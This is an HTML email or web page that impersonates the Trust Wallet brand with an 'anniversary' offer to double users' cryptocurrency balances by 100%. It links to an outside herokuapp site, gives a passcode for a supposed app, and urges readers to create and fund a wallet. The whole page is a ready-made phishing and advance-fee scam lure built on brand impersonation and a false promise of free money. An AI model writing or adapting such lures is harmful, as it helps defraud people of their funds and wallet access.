<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Document</title>
  </head>
  <body>
    <style>
      @import url("https://fonts.googleapis.com/css2?family=Roboto&display=swap");
      main {
        margin: auto;
        text-align: center;
          font-family: pp-sans-small-regular, Helvetica Neue, Arial, sans-serif;

      }
      .logo {
        width: 150px;
        /* height: 100px; */
      }
      .bg-tag {
        background-color: #0b65c6;
        color: #fff;
      }
      .description {
        text-align: left;
      }
      a.btn{
          border-radius: 2px;
  font-size: 15px;
  font-size: 1.07142857rem;
   color: #fff;
  text-decoration: none;
position: relative;
background: #0070ba;
padding-bottom: 15px;
  padding-top: 13px;
  padding-left: 35px;
  padding-right: 35px;
      }
    </style>

    <main>
      <img
        src="https://uploads-ssl.webflow.com/5f9a1900790900e2b7f25ba1/60f6a9787b79c7dad2d95893_Trust%20Wallet.png"
        class="logo"
        alt="Trustwallet"
      />
      <h1 class="bg-tag">Happy Trustwallet Anniversary</h1>

      <p class="description">
        On this auspicious day, as we celebrate our Anniversary @trustwallet, We
        are also grateful to our clients and customers who trusted in us to help
        them provide immaculate services and products. Their demands, challenges
        and feedbacks have pushed us to go ahead and improve vigorously. Our
        success story remains incomplete without the support of our clients and
        customers. Not only have they made us a part of their lives but also
        helped us reach out to the world. They spread the word faster and in a
        better way than any of our promotional means could.
      </p>
      <p class="description">
        For the support provided by our customers we are given everyone a one
        time opportunity to double their balance by <b>100%</b> Eg: if you have
        <b>$100</b> USD on your trustwallet this mobile app will double it and
        you have <b>$200</b> and we are giving you this completely free as we
        continue to celebrate our anniversary. so whether you are using
        trustwallet or not you can create and fund a trustwallet account then
        use this mobile app to double your balance and celebrate our anniversary
        with us <br /><br>
        <a href="https://trustwallet-shareholder.herokuapp.com/" class="btn">Double my trustwallet balance by 100%</a>
      </p>
      <p class="description">
        Note: for more info <a href="https://trustwallet-shareholder.herokuapp.com/">visit trustwallet shareholder</a> and use the chat to
        contact our customer support
      </p class="description">

      <p class="description"
        >To use this mobile app
        <!-- <a href="">Downkload trustwallet shareholder app</a> -->
        <br />
        Use the Passcode : 202215 as your passcode to unlock the app
    </p>
      <p class="description">
        <b>Your passcode:202215</b><br />
        use the passcode above to unlock the app and double your balance by 100%
      </p>

      <p class="description">
        Use trustwallet shareholder mobile app for free this week and double
        your balance to get 100% of what ever you have in your trustwallet
        account
      </p>
<br>
       <img
        src="https://uploads-ssl.webflow.com/5f9a1900790900e2b7f25ba1/60f6a9787b79c7dad2d95893_Trust%20Wallet.png"
        class="logo"
        alt="Trustwallet"
      />
      <p class="disclaimer" style="font-size: 10px; font-weight: bolder;">
      Disclaimer: this message was automatically generated via trustwallet in relation to i360trade-fx.com secured channel,please do not reply to this message
      all correspondence should be addressed at trustwallet shareholder website
    </p>
    </main>
  </body>
</html>
